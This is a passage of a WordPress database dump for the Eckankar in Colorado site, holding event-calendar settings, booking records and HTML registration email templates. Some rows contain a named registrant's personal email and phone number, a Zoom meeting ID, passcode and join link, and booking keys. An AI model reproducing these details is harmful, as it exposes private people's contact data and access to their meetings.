Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:12:\"category_ids\";a:0:{}s:2:\"id\";i:1;}}'),(159299,266540,'mec_fees_global_inheritance','1'),(159300,266540,'mec_fees','a:0:{}'),(159301,266540,'mec_ticket_variations_global_inheritance','1'),(159302,266540,'mec_ticket_variations','a:0:{}'),(159303,266540,'mec_reg_fields_global_inheritance','1'),(159304,266540,'mec_reg_fields','a:0:{}'),(159305,266540,'mec_bfixed_fields','a:0:{}'),(159306,266540,'mec_op','a:0:{}'),(159307,266540,'mec_fields','a:0:{}'),(159308,266540,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:5373:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4031:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(193275,269167,'_field_651','(303) 981-8537'),(193276,269167,'_field_656','Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom'),(193277,269167,'_field_649',''),(193278,269167,'_form_id','61'),(193279,269167,'_seq_num','36'),(193280,269168,'_field_654','Laura'),(193281,269168,'_field_652','Arndt'),(193282,269168,'_field_653','laura.arndt1@gmail.com'),(193283,269168,'_field_651','(303) 981-4701'),(193284,269168,'_field_656','Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom'),(193285,269168,'_field_649',''),(193286,269168,'_form_id','61'),(193287,269168,'_seq_num','37'),(193288,269169,'mec_transaction_id','FTM96030'),(193289,269169,'mec_gateway','MEC_gateway_free'),(193290,269169,'mec_gateway_label','Free'),(193291,269169,'mec_user_id','1000024'),(193292,269169,'mec_verified','1'),(193293,269169,'mec_verification_key','601995bf5d9917f52cacc82a36d2674e'),(193294,269169,'mec_cancellation_key','dfe5d8467dc01b1ae6e8e29d69285d99'),(193295,269169,'mec_confirmed','1'),(193296,269169,'mec_event_id','269109'),(161733,266683,'mec_attention_time_end','1652619600'),(161732,266683,'mec_attention_time_start','1652615100'),(161731,266683,'mec_attention_time','1652615100:1652619600'),(161730,266683,'mec_other_dates','a:0:{}'),(161729,266683,'mec_all_dates','a:0:{}'),(161728,266683,'mec_booking_time','2022-05-14 10:17:57'),(161727,266683,'mec_ticket_id',',1,'),(161726,266683,'mec_date','1652615100:1652619600'),(161725,266683,'mec_event_id','266604'),(161724,266683,'mec_confirmed','1'),(161723,266683,'mec_cancellation_key','e874ae349cd86211a3ef612364fef32b'),(161718,266682,'_seq_num','106'),(161717,266682,'_form_id','13'),(161621,266674,'mec_all_dates','a:0:{}'),(161398,266662,'mec_event_id','266568'),(161399,266662,'mec_date','1652005800:1652052600'),(159360,266543,'mec_more_info_title',''),(159361,266543,'mec_more_info_target','_self'),(159362,266543,'mec_cost',''),(159363,266543,'mec_currency','a:0:{}'),(159364,266543,'mec_additional_organizer_ids','a:0:{}'),(159365,266543,'mec_additional_location_ids','a:0:{}'),(159366,266543,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2027-04-15\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2027-04-15\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(159367,266543,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(159309,266540,'mec_event_status','EventScheduled'),(159310,266540,'mec_moved_online_link',''),(159311,266540,'mec_cancelled_reason',''),(159312,266540,'mec_display_cancellation_reason_in_single_page',''),(159313,266540,'protect_children',''),(159314,266540,'passster_activate_global_protection',NULL),(159315,266540,'passster_activate_protection',NULL),(159316,266540,'passster_protection_type','password'),(159317,266540,'boldgrid_hide_page_title','0'),(159368,266543,'mec_certain_weekdays','a:0:{}'),(159319,266540,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(159320,266540,'boldgrid_in_page_containers','1'),(159322,266540,'_dp_original','266522'),(159323,266540,'_edit_lock','1696390326:2'),(159324,266540,'_edit_last','2'),(159369,266543,'mec_allday','0'),(159370,266543,'one_occurrence','0'),(159371,266543,'mec_hide_time','0'),(159372,266543,'mec_hide_end_time','0'),(159373,266543,'mec_comment',''),(159374,266543,'mec_timezone','global'),(159375,266543,'mec_countdown_method','global'),(159376,266543,'mec_public','1'),(159377,266543,'mec_start_date','2027-04-15'),(159378,266543,'mec_start_time_hour','10'),(159379,266543,'mec_start_time_minutes','30'),(159380,266543,'mec_start_time_ampm','AM'),(159381,266543,'mec_start_day_seconds','37800'),(159382,266543,'mec_end_date','2027-04-15'),(159383,266543,'mec_end_time_hour','11'),(159384,266543,'mec_end_time_minutes','30'),(159385,266543,'mec_end_time_ampm','PM'),(159386,266543,'mec_end_day_seconds','84600'),(159387,266543,'mec_repeat_status','0'),(159388,266543,'mec_repeat_type',''),(159389,266543,'mec_repeat_interval','1'),(159390,266543,'mec_repeat_end',''),(159391,266543,'mec_repeat_end_at_occurrences',''),(159392,266543,'mec_repeat_end_at_date',''),(159393,266543,'mec_advanced_days','a:0:{}'),(159394,266543,'mec_in_days',''),(159395,266543,'mec_not_in_days',''),(159396,266543,'mec_hourly_schedules','a:0:{}'),(159397,266543,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(159398,266543,'mec_tickets','a:1:{i:1;a:20:{s:4:\"name\";s:24:\"Book Discussion - Online\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:2:\"id\";i:1;}}'),(159399,266543,'mec_fees_global_inheritance','1'),(159400,266543,'mec_fees','a:0:{}'),(159401,266543,'mec_ticket_variations_global_inheritance','1'),(159402,266543,'mec_ticket_variations','a:0:{}'),(159403,266543,'mec_reg_fields_global_inheritance','1'),(159404,266543,'mec_reg_fields','a:0:{}'),(159405,266543,'mec_bfixed_fields','a:0:{}'),(159406,266543,'mec_op','a:0:{}'),(159407,266543,'mec_fields','a:0:{}'),(159408,266543,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10129:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>xxx xxx xxx<br />\r\n<b>Passcode:</b> xxxxxx</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"#\">LINK </a>GOES HERE</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:8368:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; 